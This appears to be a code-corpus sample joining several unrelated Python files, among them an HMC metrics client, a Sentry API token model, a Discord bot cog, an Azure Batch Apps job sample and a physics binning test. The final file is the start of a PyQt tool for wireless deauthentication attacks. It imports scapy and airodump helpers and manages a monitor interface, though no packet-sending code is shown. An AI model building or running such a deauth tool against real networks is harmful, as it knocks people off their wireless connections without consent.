        for i in range(0, len(object_list)):
            vios_names.append("vios_%s" % (object_list[i].PartitionID.value()))
        return vios_names

    ########################################
    #  GET THE LONG TERM MONITOR JSON FILES
    ########################################
    def get_longtermmonitor(self, object_list):
        '''
        This function collects the long term monitor metrics of the HMC

        Interactive loop: re-fetches the LTM feed, shows a menu, downloads
        the chosen files, then sleeps 30 seconds before repeating.
        Args:
            object_list : Available VIOS object List
        '''
        choice = "y"
        while choice == "y":
            # flag 6 = normal completion (sleep before refresh);
            # flag 5 = user pressed ctrl+c during a download (skip the sleep).
            flag = 6
            HTTP_object = HTTPClient.HTTPClient(self.service, self.ip, self.root, self.content_type, self.x_api_session)
            # Make a get request for Long Term Monitor
            HTTP_object.HTTPGet(append=self.managedsystem_id+"/RawMetrics/LongTermMonitor")
            if not HTTP_object.response_b:
                log_object.log_warn("Long Term Monitor not Enabled\n")
                return
            # The response of the get request is parsed using feedparser
            feedparser_LTM = feedparser.parse(HTTP_object.response.text)
            print("\n*******Options for Long Term Monitor Metrics*********\n")
            option = input("This happens in a loop that repeats every 30 seconds \n 1.Download all the available json files \n 2.Download the recently generated json files \n 3.quit\n choose an option: ")
            if option == "1":
                flag = self.json_download_all_files(HTTP_object, feedparser_LTM, object_list)
                if flag == 5:
                    continue
                elif flag == 6:
                    # NOTE(review): json_download_all_files returns None on
                    # normal completion, so this branch only runs if the flag
                    # default is preserved — confirm intended behaviour.
                    print("Sleeps for 30 seconds")
                    time.sleep(30)
                    print("Refreshing after 30 seconds")
            elif option == "2":
                self.json_download_recent_files_phyp(HTTP_object, feedparser_LTM, object_list)
                #print(object_list)
                self.json_download_recent_files_vios(HTTP_object, feedparser_LTM, object_list)
                print("Sleeps for 30 seconds")
                time.sleep(30)
                print("Refreshing after 30 seconds")
            elif option == "3":
                choice = "n"
#LongTermMonitor_object=LongTermMonitor('9.126.138.108','f8fbeb06-09e9-39a6-91e9-be80b39cae49',x_api_session)
#LongTermMonitor_object.get_longtermmonitor()
| PowerHMC/HmcRestClient | src/performance_capacity_monitor/LongTermMonitor.py | Python | apache-2.0 | 8,441 |
"""Honeybee configurations.
Import this module in every module that you need to access Honeybee configurations.
Usage:
import config
print config.radlibPath
print config.radbinPath
print config.platform
config.radbinPath = "c:/radiance/bin"
"""
from honeybee.config import *
from collections import namedtuple
import os
import sys
class Platform(object):
    """Identify how the script is currently executing.
    0: Running as standard python script
    1: Running inside grasshopper component
    2: Running inside dynamo node
    3: Running inside dynamo node from Revit
    Usage:
        platform = Platform(mute=True)
        p = platform.platform
        pId = platform.platformId
        print "Platform is {} > {}.".format(p, pId)
        >> Honeybee is running from gh. platform id: 1.
    """
    def __init__(self, mute=False):
        """Find current platform and platformId.

        Detection is based on the host process's working directory
        (Rhino/Dynamo/Revit each start IronPython from their own folder).
        """
        self.__mute = mute
        self.platform = None
        """Current platform that imports the libraries as a string.
        Values:
            None: Running as standard python script
            'gh': Grasshopper
            'ds': Dynamo
            'rvt': Dynamo from inside Revit
        """
        self.platformId = 0
        """Current platformId that imports the libraries as a string.
        Values:
            0: Running as standard python script
            1: Grasshopper
            2: Dynamo
            3: Dynamo from inside Revit
        """
        # created a named tuple for libraries
        self._Libs = namedtuple("Libs", "Rhino Grasshopper Dynamo DesignScript")
        self.libs = None
        """Collection of libraries for this platform.
        Usage:
            from honeybeex import config
            gh = config.libs.Grasshopper
            rc = config.libs.Rhino
        """
        # os.getcwdu (Python 2) returns the host application's working
        # directory; its path is used to infer the host application.
        __cwd = os.getcwdu().lower()
        if __cwd.find("rhino") > -1:
            # It's running from inside grasshopper component
            self.platform = "gh"
            self.platformId = 1
        elif __cwd.find("dynamo") > -1:
            # It's running from inside dynamo script
            self.platform = "ds"
            self.platformId = 2
        elif __cwd.find("revit") > -1:
            # It's running from inside Revit from a Dynamo node
            self.platform = "rvt"
            self.platformId = 3
        elif __cwd.find("python") == -1:
            # Revit changes the directory to where the file is, if user change
            # the revit file but doesn't close the Dynamo window! :|
            self.platform = "rvt"
            self.platformId = 3
        if not mute:
            print "Honeybee is running from {}. platform id: {}." \
                .format(self.platform, self.platformId)
        self.importGeometryLibraries()
    @property
    def isRevit(self):
        """Return True if platform is Revit."""
        return self.platform == "rvt"
    @property
    def isDynamo(self):
        """Return True if platform is Dynamo Studio."""
        return self.platform == "ds"
    @property
    def isGrasshopper(self):
        """Return True if platform is Grasshopper."""
        return self.platform == "gh"
    @property
    def isRevitOrDynamo(self):
        """Return True if platform is Revit or Dynamo Studio."""
        return self.isRevit or self.isDynamo
    def importGeometryLibraries(self):
        """
        Import geometry libraries based on platform.
        This approch will avoid importing libraries for several times.
        Populates self.libs with a Libs namedtuple; fields for the other
        platform are left as None.
        """
        # import libraries once in config and share it between all the geometry libraries
        if not self.__mute:
            print "Importing geometry libraries..."
        if self.platformId == 1:
            # Import Rhino and Grasshopper
            try:
                gh = __import__('Grasshopper')
                if not self.__mute:
                    print "Grasshopper imported under config.libs.Grasshopper"
                rc = __import__('Rhino')
                if not self.__mute:
                    print "Rhino imported under config.libs.Rhino"
            except ImportError as e:
                print "Failed to import geometry libraries {}".format(e)
            else:
                # Assign Rhino and Grasshopper to the libraries
                self.libs = self._Libs(rc, gh, None, None)
        if self.platformId == 2 or self.platformId == 3:
            try:
                import clr
                clr.AddReference('DynamoCore')
                clr.AddReference('ProtoGeometry')
                clr.AddReference('ProtoInterface')
                import Autodesk.DesignScript as ds
                if not self.__mute:
                    print "DesignScript imported under config.libs.DesignScript"
                # NOTE(review): assumes clr.References[2] is the ProtoGeometry
                # assembly added above -- depends on reference order; confirm.
                __dynamoPath = "\\".join((clr.References[2].Location).split("\\")[:-1])
                sys.path.append(__dynamoPath)
                import Dynamo as dyn
            except ImportError as e:
                print "Failed to import geometry libraries {}".format(e)
            else:
                # Assign Rhino and Grasshopper to the libraries
                self.libs = self._Libs(None, None, dyn, ds)
    def __repr__(self):
        """Return platform."""
        return "{}".format(self.platform)
# Expose platform and libraries as module-level globals so importers can do
# `config.libs.Rhino` etc. without instantiating Platform themselves.
# Instantiating here runs detection (and prints, since mute=False) at import.
platform = Platform(mute=False)
platformId = platform.platformId
libs = platform.libs
| antonszilasi/honeybeex | honeybeex/config.py | Python | gpl-3.0 | 5,455 |
from __future__ import absolute_import, print_function
import six
from bitfield import BitField
from datetime import timedelta
from django.db import models, transaction
from django.utils import timezone
from uuid import uuid4
from sentry.models.apiscopes import ApiScopes
from sentry.db.models import (
ArrayField, Model, BaseManager, FlexibleForeignKey, sane_repr
)
DEFAULT_EXPIRATION = timedelta(days=30)
class ApiToken(Model):
    """An API token granting its user access, optionally scoped and
    bound to an ApiApplication, with optional expiry/refresh support."""
    __core__ = True
    # users can generate tokens without being application-bound
    application = FlexibleForeignKey('sentry.ApiApplication', null=True)
    user = FlexibleForeignKey('sentry.User')
    # Defaults use lambdas because ApiToken is not yet bound at class-body
    # evaluation time, so ApiToken.generate_token cannot be referenced directly.
    token = models.CharField(
        max_length=64,
        unique=True,
        default=lambda: ApiToken.generate_token(),
    )
    refresh_token = models.CharField(
        max_length=64,
        unique=True,
        null=True,
        default=lambda: ApiToken.generate_token(),
    )
    # NULL expires_at means the token never expires (see is_expired).
    expires_at = models.DateTimeField(
        null=True, default=lambda: timezone.now() + DEFAULT_EXPIRATION
    )
    # Legacy bitfield of scopes; scope_list supersedes it (see get_scopes).
    scopes = BitField(flags=ApiScopes().to_bitfield())
    scope_list = ArrayField(of=models.TextField)
    date_added = models.DateTimeField(default=timezone.now)
    objects = BaseManager(cache_fields=('token', ))
    class Meta:
        app_label = 'sentry'
        db_table = 'sentry_apitoken'
    __repr__ = sane_repr('user_id', 'token', 'application_id')
    def __unicode__(self):
        return six.text_type(self.token)
    @classmethod
    def generate_token(cls):
        """Return a new random 64-char hex token."""
        return uuid4().hex + uuid4().hex
    @classmethod
    def from_grant(cls, grant):
        """Create a token from an OAuth authorization grant."""
        with transaction.atomic():
            return cls.objects.create(
                application=grant.application,
                user=grant.user,
                scope_list=grant.get_scopes(),
            )
    def is_expired(self):
        """Return True if the token has an expiry in the past."""
        if not self.expires_at:
            return False
        return timezone.now() >= self.expires_at
    def get_audit_log_data(self):
        return {
            'scopes': self.get_scopes(),
        }
    def get_scopes(self):
        """Return scopes as a list, preferring scope_list over the
        legacy scopes bitfield."""
        if self.scope_list:
            return self.scope_list
        return [k for k, v in six.iteritems(self.scopes) if v]
    def has_scope(self, scope):
        return scope in self.get_scopes()
    def get_allowed_origins(self):
        """Return CORS origins from the bound application, if any."""
        if self.application:
            return self.application.get_allowed_origins()
        return ()
    def refresh(self, expires_at=None):
        """Rotate token and refresh_token, resetting the expiry."""
        if expires_at is None:
            expires_at = timezone.now() + DEFAULT_EXPIRATION
        self.update(
            token=type(self).generate_token(),
            refresh_token=type(self).generate_token(),
            expires_at=expires_at,
        )
| looker/sentry | src/sentry/models/apitoken.py | Python | bsd-3-clause | 2,742 |
"""
Message Types for user_api emails
"""
from django.conf import settings
from openedx.core.djangoapps.ace_common.message import BaseMessageType
from openedx.core.djangoapps.site_configuration import helpers
class DeletionNotificationMessage(BaseMessageType):
    """
    Message to notify learners that their account is queued for deletion.
    """
    def __init__(self, *args, **kwargs):
        super(DeletionNotificationMessage, self).__init__(*args, **kwargs)  # lint-amnesty, pylint: disable=super-with-arguments
        # Resolve the sender first: site-configured address, falling back
        # to the platform-wide default.
        sender = helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
        # Transactional messages bypass marketing opt-out handling.
        self.options['transactional'] = True  # pylint: disable=unsupported-assignment-operation
        self.options['from_address'] = sender  # pylint: disable=unsupported-assignment-operation
| stvstnfrd/edx-platform | openedx/core/djangoapps/user_api/message_types.py | Python | agpl-3.0 | 806 |
#! /usr/bin/env python
# Example script: scatter plots with ppclass. One field is plotted as a
# function of another via .func(), using marker-only line styles.
from ppclass import pp
# --- Load a 1D slice of surface temperature (all x, fixed y and t). ---
tsurf = pp()
tsurf.file = "/home/aymeric/Big_Data/DATAPLOT/diagfired.nc"
tsurf.var = "tsurf"
tsurf.x = None
tsurf.y = 10.
tsurf.t = 2.
tsurf.getdefineplot()
# --- Surface pressure on the same slice (<< copies the request settings). ---
ps = pp()
ps << tsurf
ps.var = "ps"
ps.getdefineplot()
# Scatter: ps as a function of tsurf (green hexagons, no connecting line).
S = ps.func(tsurf)
S.p[0].linestyle=""
S.p[0].marker="h"
S.p[0].color="g"
S.makeplot()
# Scatter: total ice versus tsurf (red diamonds).
icetot = pp()
icetot << tsurf
icetot.var = "icetot"
icetot.getdefineplot()
S2 = icetot.func(tsurf)
S2.p[0].linestyle=""
S2.p[0].marker="D"
S2.p[0].color="r"
S2.makeplot()
# --- Wind speed magnitude at z=1 from u and v components. ---
u = pp()
u << tsurf
u.var = "u"
u.z = 1.
u.get()
v = pp()
v << u
v.var = "v"
v.get()
wind = u**2 + v**2
wind = wind**0.5
# Scatter: wind speed versus surface pressure (black circles), saved to file.
S3 = wind.func(ps)
S3.p[0].linestyle=""
S3.p[0].marker="o"
S3.p[0].color="k"
S3.p[0].ylabel="wind speed $\sqrt{u^{2}+v^{2}}$ (m s$^{-1}$)"
S3.filename="scatter"
S3.makeplot()
## multidim scatter also possible
## the important thing is forcedimplot
tsurf = pp()
tsurf.file = "/home/aymeric/Big_Data/DATAPLOT/diagfired.nc"
tsurf.var = "tsurf"
tsurf.x = None
tsurf.y = None
tsurf.t = 2.
tsurf.forcedimplot = 1
tsurf.getdefineplot()
ps = pp()
ps << tsurf
ps.var = "ps"
ps.getdefineplot()
S = ps.func(tsurf)
S.p[0].linestyle=""
S.p[0].marker="h"
S.p[0].color="g"
S.makeplot()
| aymeric-spiga/planetoplot | examples/ppclass_reference/scatter.py | Python | gpl-2.0 | 1,220 |
# -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2017 SML
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from collections import defaultdict
import discord
import os
from discord import InvalidArgument, Forbidden, HTTPException
from discord.ext import commands
import argparse
from cogs.utils import checks
from cogs.utils.dataIO import dataIO
PATH = os.path.join("data", "channelmanager")
JSON = os.path.join(PATH, "settings.json")
def nested_dict():
    """Return an autovivifying dictionary.

    Accessing a missing key creates another nested_dict, so chained
    lookups like ``d[a][b][c]`` never raise KeyError.
    """
    return defaultdict(nested_dict)
def channel_edit_parser():
    """Build the argparse parser used by the ``[p]chm edit`` command.

    All three options take one-or-more space-separated values and are
    left as None by argparse when omitted.
    """
    parser = argparse.ArgumentParser(prog='[p]chm edit')
    option_specs = (
        ('-r', '--roles', 'Roles to apply permissions to'),
        ('-c', '--channels', 'List of channels separated by space'),
        ('-p', '--permissions', 'List of permitted permissions'),
    )
    for short_flag, long_flag, help_text in option_specs:
        parser.add_argument(short_flag, long_flag, nargs='+', help=help_text)
    return parser
class ChannelManager:
    """Channel Manager."""

    def __init__(self, bot):
        """Init."""
        self.bot = bot
        self.settings = nested_dict()
        self.settings.update(dataIO.load_json(JSON))

    @commands.group(aliases=['chm'], pass_context=True)
    @checks.mod_or_permissions()
    async def channelman(self, ctx):
        """Channel Manager."""
        if ctx.invoked_subcommand is None:
            await self.bot.send_cmd_help(ctx)

    @channelman.group(pass_context=True, no_pm=True)
    @checks.mod_or_permissions(manage_channels=True)
    async def create(self, ctx):
        """Create Channel."""
        if ctx.invoked_subcommand is None or isinstance(ctx.invoked_subcommand, commands.Group):
            await self.bot.send_cmd_help(ctx)

    @create.command(name="user", pass_context=True, no_pm=True)
    @checks.mod_or_permissions(manage_channels=True)
    async def create_user(self, ctx, name, user: discord.Member, after: discord.Channel = None):
        """User specific channel.
        Everyone can read but only one person can write.
        """
        server = ctx.message.server
        # Everyone may read; only the named user receives send rights.
        channel = await self.bot.create_channel(
            server,
            name,
            discord.ChannelPermissions(
                target=server.default_role,
                overwrite=discord.PermissionOverwrite(
                    read_messages=True,
                    send_messages=False
                )
            ),
            discord.ChannelPermissions(
                target=user,
                overwrite=discord.PermissionOverwrite(
                    send_messages=True
                )
            ),
            type=discord.ChannelType.text
        )
        await self.bot.say("Channel created: {}".format(channel))

    @channelman.group(pass_context=True, no_pm=True)
    @checks.mod_or_permissions(manage_channels=True)
    async def move(self, ctx):
        """Move channel."""
        if ctx.invoked_subcommand is None or isinstance(ctx.invoked_subcommand, commands.Group):
            await self.bot.send_cmd_help(ctx)

    @move.command(name="after", pass_context=True, no_pm=True)
    @checks.mod_or_permissions(manage_channels=True)
    async def move_after(self, ctx, channel: discord.Channel, after_channel: discord.Channel):
        """Move channel after a channel."""
        try:
            await self.bot.move_channel(channel, after_channel.position + 1)
            await self.bot.say("Channel moved.")
        except (InvalidArgument, Forbidden, HTTPException) as err:
            await self.bot.say("Move channel failed. " + str(err))

    # FIX: decorator previously used the nonexistent permission name
    # ``manage_channel``; corrected to ``manage_channels`` for consistency
    # with the other commands in this cog.
    @channelman.command(pass_context=True, no_pm=True)
    @checks.mod_or_permissions(manage_channels=True)
    async def edit(self, ctx, *args):
        """Edit channel permissions.
        -r role
        -c channels to apply to, separated by space
        -p permissions to apply
        Permissions:
        read_messages=1
        send_messages=0
        manage_messages=1
        read_message_history
        """
        parser = channel_edit_parser()
        try:
            pargs = parser.parse_args(args)
        except SystemExit:
            await self.bot.send_cmd_help(ctx)
            return
        channels = pargs.channels
        roles = pargs.roles
        permissions = pargs.permissions
        # FIX: argparse leaves omitted options as None, which previously
        # crashed the iteration below with a TypeError. All three options
        # are required to build an overwrite, so show help instead.
        if not (channels and roles and permissions):
            await self.bot.send_cmd_help(ctx)
            return
        server = ctx.message.server
        # Build a single overwrite object from "name=0/1" pairs.
        overwrite = discord.PermissionOverwrite()
        for perm in permissions:
            p = perm.split('=')
            name = p[0]
            value = p[1] == '1'
            setattr(overwrite, name, value)
        # Resolve role/channel names, silently skipping unknown names.
        c_list = []
        r_list = []
        for role in roles:
            r = discord.utils.get(server.roles, name=role)
            if r:
                r_list.append(r)
        for channel in channels:
            c = discord.utils.get(server.channels, name=channel)
            if c:
                c_list.append(c)
        # Apply the same overwrite to every (channel, role) combination.
        for c in c_list:
            for r in r_list:
                await self.bot.edit_channel_permissions(c, r, overwrite)
        await self.bot.say(
            "Permissions updated for {} for {}".format(
                ", ".join([c.name for c in c_list]),
                ", ".join([r.name for r in r_list])
            )
        )
        await self.bot.say(
            "{}\n{}\n{}".format(
                ", ".join(channels),
                ", ".join(roles),
                ", ".join(permissions)
            )
        )
def check_folder():
    """Create the cog's data directory when it does not exist yet."""
    if not os.path.isdir(PATH):
        os.makedirs(PATH)
def check_file():
    """Initialise the settings file with an empty object when it is
    missing or holds invalid JSON."""
    if dataIO.is_valid_json(JSON):
        return
    dataIO.save_json(JSON, {})
def setup(bot):
    """Red cog entry point: prepare data storage, then register the cog."""
    check_folder()
    check_file()
    bot.add_cog(ChannelManager(bot))
| smlbiobot/SML-Cogs | channelmanager/channelmanager.py | Python | mit | 6,880 |
#-------------------------------------------------------------------------
# The Azure Batch Apps Python Client
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#--------------------------------------------------------------------------
"""
A sample script showing use of the batchapps module to construct and submit
an arbitrary job.
"""
import getpass
import sys
import webbrowser
from batchapps import (
FileManager,
JobManager,
Credentials,
Configuration)
from batchapps.credentials import AzureOAuth
from batchapps.exceptions import (
AuthenticationException,
RestCallException,
InvalidConfigException)
LOG_LEVEL = "debug"
ASSET_DIR = "//Path/To/Assets/Directory"
# These settings will be specific to a users Batch Apps service.
ENDPOINT = "myservice.batchapps.core.windows.net"
ACCOUNT_ID = "ClientID=abcd-1234-efgh-5678;TenantID=wxzy-8765-tuv-4321"
ACCOUNT_KEY = "********"
def authentication(mode):
    """
    Authenticate against the Batch Apps service.

    First attempts an unattended (key-based) session; when that fails,
    falls back to the interactive browser-based OAuth flow.

    :Args:
        - mode (:class:`.Configuration`): an instance of class Configuration as
          returned by create_config()

    :Returns:
        - a :class:`.Credentials` instance object

    :Raises:
        - RuntimeError if both authentication flows fail
    """
    try:
        return AzureOAuth.get_unattended_session(config=mode)
    except (AuthenticationException, InvalidConfigException) as e:
        print("Could not get unattended session: {0}".format(e))
    # Interactive fallback: open the AAD consent page in a browser and ask
    # the user to paste back the redirect URL containing the auth code.
    try:
        auth_url = AzureOAuth.get_authorization_url(config=mode)[0]
        webbrowser.open(auth_url)
        redirect_url = input("Please enter authentication url: ")
        return AzureOAuth.get_authorization_token(redirect_url,
                                                  config=mode)
    except (AuthenticationException, InvalidConfigException) as e:
        raise RuntimeError("Failed to authenticate: {0}".format(e))
def create_config():
    """
    Looks for configuration settings for specified application, otherwise
    creates new configuration, sets chosen log_level.

    :Returns:
        - a :class:`.Configuration` instance object

    :Raises:
        - RuntimeError if a valid configuration cannot be created
    """
    global LOG_LEVEL
    if input("Run in debug mode? (yes/no)")[0].lower() == 'n':
        LOG_LEVEL = "info"
    try:
        # Look for application in existing config file
        config = Configuration(log_level=LOG_LEVEL, jobtype="MyApp")
        print("Config found.")
        return config
    except InvalidConfigException:
        print("Valid config not found. Attempting to create new config.")
    try:
        config = Configuration(log_level=LOG_LEVEL)
        config.aad_config(endpoint=ENDPOINT,
                          account=ACCOUNT_ID,
                          key=ACCOUNT_KEY,
                          unattended=True)
        config.add_jobtype("MyApp")
        config.current_jobtype("MyApp")
        # Examples of default config settings for your job
        config.set("width", "500")
        config.set("height", "500")
        # Set MyApp to be the default job type
        config.set_default_jobtype()
    except InvalidConfigException as e:
        # FIX: this raise was previously swallowed by a ``return config``
        # inside a ``finally`` block (which also raised NameError when the
        # Configuration constructor itself failed). Save/return now happen
        # only on the success path, so this error propagates to the caller.
        raise RuntimeError("Invalid Configuration: {0}".format(e))
    config.save_config()
    return config
def submit_job(auth, config):
    """
    Create a new job submission and send it to the cloud.
    :Args:
        - auth :class:`.Credentials`: instance of the Credentials
          class as returned by authentication()
        - config :class:`.Configuration`: instance of the Configuration
          class as returned by create_config()
    """
    asset_mgr = FileManager(auth, cfg=config)
    job_mgr = JobManager(auth, cfg=config)
    # Converts directory contents to a FileCollection
    file_collection = asset_mgr.files_from_dir(ASSET_DIR)
    new_job = job_mgr.create_job("Test Job", files=file_collection)
    # Set various job parameters. The pre-configured parameters for the
    # job type can be found using new_job.get_default_params().
    new_job.instances = 5 # Number of machines to work on the job.
    new_job.start = 1
    new_job.end = 10
    new_job.numFrames = 10
    # This sets the file that will be run to start the job.
    # In this case the first file in the FileCollection.
    new_job.set_job_file(file_collection[0])
    # Upload all files needed for the job.
    new_job.required_files.upload(threads=4)
    # Submission itself can fail independently of the upload above.
    try:
        submission = new_job.submit()
        print("New job submitted with ID: {0}".format(submission['jobId']))
    except RestCallException as e:
        print("Job failed: {0}".format(e))
if __name__ == "__main__":
    # End-to-end sample flow: config -> credentials -> job submission.
    try:
        cfg = create_config()
        creds = authentication(cfg)
        submit_job(creds, cfg)
    except RuntimeError as exp:
        print("Job failed: {0}".format(exp))
| Azure/azure-batch-apps-python | samples/BatchAppsExample-submit_job.py | Python | mit | 5,961 |
# Copyright 2018 The Exoplanet ML Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests the Python wrapping of bin_by_phase.h."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
import numpy as np
from box_least_squares.python import bin_by_phase
class BinByPhaseTest(absltest.TestCase):
  """Tests for the bin_by_phase wrapper: input validation and binning."""
  def testEmptyTimeVector(self):
    with self.assertRaises(ValueError):
      bin_by_phase.bin_by_phase(time=[], values=[1, 2, 3], period=1, nbins=5)
  def testDifferentSizeVectors(self):
    with self.assertRaises(ValueError):
      bin_by_phase.bin_by_phase(
          time=[1, 2, 3, 4], values=[11, 22, 33, 44, 55], period=1, nbins=5)
  def testNonPositivePeriod(self):
    with self.assertRaises(ValueError):
      bin_by_phase.bin_by_phase(
          time=[1, 2, 3, 4, 5], values=[11, 22, 33, 44, 55], period=0, nbins=5)
  def testNonPositiveNbins(self):
    with self.assertRaises(ValueError):
      bin_by_phase.bin_by_phase(
          time=[1, 2, 3, 4, 5], values=[11, 22, 33, 44, 55], period=0, nbins=-1)
  def testBinByPhase(self):
    # 25 evenly spaced samples; values chosen symmetric about zero so the
    # per-bin sums below are easy to verify by hand.
    time = np.array(
        [
            0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3,
            1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0, 2.1, 2.2, 2.3, 2.4
        ],
        dtype=np.float)
    values = np.array(
        [
            -12, -11, -10, -9, -8, -7, -6, -5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5,
            6, 7, 8, 9, 10, 11, 12
        ],
        dtype=np.float)
    # If bin width (period / nbins) exactly divides (t mod period) then the
    # bin index may be one less than expected due to floating point arithmetic.
    # To ensure the bin indices are computed as expected, add a small offset to
    # the time values.
    time += 1e-10
    # Period larger than time range.
    binned_values, binned_square_values, bin_counts = bin_by_phase.bin_by_phase(
        time, values, period=5, nbins=5)
    np.testing.assert_almost_equal(binned_values, [-75, 25, 50, 0, 0])
    np.testing.assert_almost_equal(binned_square_values, [645, 145, 510, 0, 0])
    np.testing.assert_almost_equal(bin_counts, [10, 10, 5, 0, 0])
    # Period equal to time range.
    binned_values, binned_square_values, bin_counts = bin_by_phase.bin_by_phase(
        time, values, period=2.5, nbins=5)
    np.testing.assert_almost_equal(binned_values, [-50, -25, 0, 25, 50])
    np.testing.assert_almost_equal(binned_square_values,
                                   [510, 135, 10, 135, 510])
    np.testing.assert_almost_equal(bin_counts, [5, 5, 5, 5, 5])
    # Period smaller than time range.
    binned_values, binned_square_values, bin_counts = bin_by_phase.bin_by_phase(
        time, values, period=0.5, nbins=5)
    np.testing.assert_almost_equal(binned_values, [-10, -5, 0, 5, 10])
    np.testing.assert_almost_equal(binned_square_values,
                                   [270, 255, 250, 255, 270])
    np.testing.assert_almost_equal(bin_counts, [5, 5, 5, 5, 5])
    # All values in the first or third bin.
    binned_values, binned_square_values, bin_counts = bin_by_phase.bin_by_phase(
        time, values, period=0.2, nbins=5)
    np.testing.assert_almost_equal(binned_values, [0, 0, 0, 0, 0])
    np.testing.assert_almost_equal(binned_square_values, [728, 0, 572, 0, 0])
    np.testing.assert_almost_equal(bin_counts, [13, 0, 12, 0, 0])
    # All values in the first bin.
    binned_values, binned_square_values, bin_counts = bin_by_phase.bin_by_phase(
        time, values, period=0.1, nbins=5)
    np.testing.assert_almost_equal(binned_values, [0, 0, 0, 0, 0])
    np.testing.assert_almost_equal(binned_square_values, [1300, 0, 0, 0, 0])
    np.testing.assert_almost_equal(bin_counts, [25, 0, 0, 0, 0])
    # Values distributed.
    binned_values, binned_square_values, bin_counts = bin_by_phase.bin_by_phase(
        time, values, period=0.14159, nbins=5)
    np.testing.assert_almost_equal(binned_values, [-9, 6, 3, -10, 10])
    np.testing.assert_almost_equal(binned_square_values,
                                   [319, 182, 307, 174, 318])
    np.testing.assert_almost_equal(bin_counts, [6, 4, 6, 4, 5])
# Allow running this test module directly (outside a test runner).
if __name__ == "__main__":
  absltest.main()
| google-research/exoplanet-ml | exoplanet-ml/box_least_squares/python/bin_by_phase_test.py | Python | apache-2.0 | 4,734 |
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from subprocess import Popen,PIPE
from scapy.all import *
from Dns_Func import frm_dhcp_Attack
import threading
from os import popen,system,getuid,path,makedirs
from re import search,compile,match
from Core.Settings import frm_Settings
from Modules.fuc_airodump import airdump_start,get_network_scan
class frm_window(QMainWindow):
    """Top-level window hosting the deauth attack widget."""
    def __init__(self, parent=None):
        super(frm_window, self).__init__(parent)
        self.form_widget = frm_deauth(self)
        self.setCentralWidget(self.form_widget)
        self.setWindowTitle("Deauth Attack wireless Route")
        self.setWindowIcon(QIcon('rsc/icon.ico'))
        self.config = frm_Settings()
        self.loadtheme(self.config.XmlThemeSelected())
    def loadtheme(self,theme):
        """Apply the stylesheet for *theme* from the Core directory.

        FIX: both branches of the old ``if theme != "theme2"`` check were
        byte-identical, so the conditional was dead code; one read path
        is equivalent.
        """
        sshFile=("Core/%s.css"%(theme))
        with open(sshFile,"r") as fh:
            self.setStyleSheet(fh.read())
    def closeEvent(self, event):
        """Confirm before quitting; when root, also tear down monitor mode."""
        reply = QMessageBox.question(self, 'About Exit',"Are you sure to quit?", QMessageBox.Yes |
        QMessageBox.No, QMessageBox.No)
        if reply == QMessageBox.Yes:
            event.accept()
            if getuid() == 0:
                # Root only: stop the monitor interface created for scans.
                system("airmon-ng stop mon0")
                system("clear")
                self.deleteLater()
        else:
            event.ignore()
class frm_deauth(QWidget):
    def __init__(self, parent=None):
        """Initialise widget state; the UI itself is built in window_qt()."""
        super(frm_deauth, self).__init__(parent)
        self.Main = QVBoxLayout()
        self.interface = "mon0"
        self.xmlcheck = frm_Settings()
        self.ap_list = []       # access points collected by the scapy scan
        self.pacote = []        # crafted deauth packets
        self.control = None     # set non-None by kill_thread to stop attacks
        self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
        self.window_qt()
def select_target(self):
item = self.tables.selectedItems()
if item != []:
self.linetarget.setText(item[2].text())
else:
QMessageBox.critical(self, "Error in row", "Nothing row in tables, please try scan network again")
self.linetarget.clear()
    def window_qt(self):
        """Build the widget UI: scan table, target/client inputs, buttons."""
        self.controlador = QLabel("")
        self.attack_OFF()
        self.form0 = QFormLayout()
        self.form1 = QFormLayout()
